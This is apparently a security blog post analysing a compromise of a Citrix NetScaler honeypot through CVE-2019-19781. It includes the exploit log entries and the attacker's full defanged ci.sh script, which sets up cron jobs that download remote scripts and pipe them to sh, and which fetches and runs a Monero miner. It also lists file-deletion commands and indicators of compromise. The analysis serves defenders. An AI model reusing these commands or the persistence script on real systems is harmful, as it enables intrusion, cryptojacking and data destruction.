TrustedSec - NetScaler Honeypot

The Citrix NetScaler remote code execution vulnerability (CVE-2019-19781) has been a pretty popular topic over the last few weeks. Once public exploits of the vulnerability started to appear in the wild, TrustedSec deployed a Citrix NetScaler honeypot. We did not have to wait long for the attacks to begin. Less than 24 hours after deployment, the honeypot was compromised for the first time.

January 12, 2020 Compromise

The first compromise came from IP address 193.187.174.104 and started with the attacker accessing the smb.conf file using the directory traversal attack. This is a good litmus test for the attackers to see if a system is vulnerable and was often seen before an attack occurred.

193.187.174.104 - - [12/Jan/2020:11:26:02 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83 "-"

Shortly after, the HTTP access logs recorded a number of POSTs to newbm.pl followed by a GET to an XML file. This indicates the attacker used the Project India exploit, in which the tool executes a command through the vulnerability and places the output into an XML file. The XML file is then requested by the tool to show the output to the attacker.

193.187.174.104 - - [12/Jan/2020:11:26:03 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 15 "-"
 193.187.174.104 - - [12/Jan/2020:11:26:04 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 15 "-"
 193.187.174.104 - - [12/Jan/2020:11:26:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 15 "-"
 193.187.174.104 - - [12/Jan/2020:11:26:11 +0000] "GET /vpn/../vpns/portal/AOUnCfwrjIJrpngpwLXHddqADAxTraBan.xml HTTP/1.1" 200 - "-"

Fortunately, to see what the attacker executed we only have to view the XML file left over in the /netscaler/portal/templates directory. From analysis of the XML files, the attacker ran “cat /etc/passwd” multiple times and then downloaded and ran a script named ci.sh (defanged and shown below).

!/bin/sh
 LDR="wget -q -O -"
 if [ -s /usr/bin/curl ]; then
   LDR="curl"
 fi
 if [ -s /usr/bin/wget ]; then
   LDR="wget -q -O -"
 fi
 crontab -l | grep -e "185.178.45.221" | grep -v grep
 if [ $? -eq 0 ]; then
   echo "cron good"
 else
   (
     crontab -l 2>/dev/null
     echo "* * * * * $LDR hxxp://185[.]178[.]45[.]221/ci.sh | sh > /dev/null 2>&1"
   ) | crontab -
 fi
 crontab -l | grep -e "62.113.112.33" | grep -v grep
 if [ $? -eq 0 ]; then
   echo "cron good"
 else
   (
     crontab -l 2>/dev/null
     echo "* * * * * $LDR hxxp://62[.]113[.]112[.]33/ci.sh | sh > /dev/null 2>&1"
   ) | crontab -
 fi
 download() {
    curl -o /var/tmp/netscalerd hxxp://217[.]12[.]221[.]12/netscalerd
 }
 if [ ! "$(ps -ax|grep '/var/tmp/netscalerd'|grep -v grep)" ];
 then
     download
     chmod +x /var/tmp/netscalerd
     nohup /var/tmp/netscalerd > /dev/null 2>&1 &
     sleep 5
     rm -rf /var/tmp/netscalerd
 else
     echo "Running"
 fi

The script performs two (2) tasks. The first is to check cron to make sure the that the backdoor entries are still present. If not, they are added back in. The backdoor entries are pretty simple—every minute they will download a new version of ci.sh from two (2) different IP addresses and execute them. Since the backdoor uses the Bourne shell, everything is logged in /var/log/sh.log.

The script verifies whether the program named netscalerd is running; if not, the program is downloaded and executed. After execution, the program is deleted. This is a common UNIX anti-forensics technique since, unlike Windows, programs can be deleted after they are executed and will continue to run.

Analysis of netscalerd (MD5 5be9abbe208a1e03ef3def7f9fa816d3) found that it is the Monero coin miner, XMRig 5.5.0.

The ci.sh backdoor was also used to execute commands other than the script above. After the backdoor had been active for around 36 hours, the following commands were executed:

find /netscaler/portal/scripts -type f -newermt 1/07/2019 0:00:00 -exec rm -rf {} ;
 find /netscaler/portal/templates -type f -newermt 1/07/2019 0:00:00 -exec rm -rf {} ;
 mv /netscaler/portal/scripts/newbm.pl /netscaler/portal/scripts/newbmnnn.pl

These commands deleted any files in the /netscaler/portal/scripts and /netscaler/portal/templates directories newer than January 07, 2019 and renamed the newbm.pl file to newbmnnn.pl. The newbm.pl allows remote code execution. Interestingly, this ended up deleting all of the files in these two (2) directories, which may or may not have been the intent of the attacker. Fortunately, we had made a backup of those directories.

Shortly after this occurred, the sites containing ci.sh no longer served them, so this could have been the attacker’s way to go dark.

Conclusion

Thus far we have not seen any more activity, but it is only a matter of time. Other sources have reported additional activity, so we expect more to come as time goes on. As we get more action, we will update this post with new information.

Indicators of Compromise

62.113.112.33
185.178.45.221
193.187.174.104
217.12.221.12

0e431d0d9e0fc371c163e4de5226c50b – ci.sh

5be9abbe208a1e03ef3def7f9fa816d3 – netscalerd

References

Critical Exposure in Citrix ADC (NetScaler) – Unauthenticated Remote Code Execution
NetScaler Remote Code Execution Forensics

https://nvd.nist.gov/vuln/detail/CVE-2019-19781#vulnCurrentDescriptionTitle

The post NetScaler Honeypot appeared first on TrustedSec.



from TrustedSec https://www.trustedsec.com/blog/netscaler-honeypot/

Comments

Post a Comment

Popular posts from this blog

KnowBe4 - Scam Of The Week: "When Users Add Their Names to a Wall of Shame"

Image
Eric Howes , KnowBe4 Principal Lab Researcher, found out about another insidious bad guy trick: " If you work in IT there has undoubtedly come a dark moment when you wondered to yourself just who among your employee users would be gullible enough to click through a phishing email and potentially bring down your organization. from KnowBe4 Security Awareness Training Blog https://blog.knowbe4.com/when-users-add-their-names-to-a-wall-of-shame
Read more

Krebs - NY Charges First American Financial for Massive Data Leak

Image
In May 2019, KrebsOnSecurity broke the news that the website of mortgage title insurance giant First American Financial Corp. had exposed approximately 885 million records related to mortgage deals going back to 2003. On Wednesday, regulators in New York announced that First American was the target of their first ever cybersecurity enforcement action in connection with the incident, charges that could bring steep financial penalties. First American Financial Corp. Santa Ana, Calif.-based  First American [ NYSE:FAF ] is a leading provider of title insurance and settlement services to the real estate and mortgage industries. It employs some 18,000 people and brought in $6.2 billion in 2019 . As first reported here last year , First American’s website exposed 16 years worth of digitized mortgage title insurance records — including bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts, and drivers license images. The docum
Read more

SBS CyberSecurity - In The Wild 166

Image
  In The Wild - CyberSecurity Newsletter Welcome to the 166 th issue of In The Wild, SBS’ weekly CyberSecurity newsletter. The objective of this newsletter is to share threat intelligence, news articles that are relevant, new and updated guidance, and other information to help you make better cybersecurity decisions. Follow SBS CyberSecurity on Social Media for more articles, stories, news, and resources!           Below, you will find some of the latest-and-greatest news stories, articles, videos, and links from the past week in cybersecurity. Some of the following stories have been shared by consultants, others by the SBS Institute, and others yet simply been found in the far corners of the Internet. We hope you find the following stories relevant, interesting, and – most of all – useful. Enjoy. CyberRiskNOW Virtual Conference SBS Educational Resources This virtual conference is designed to provide interactive training on evo
Read more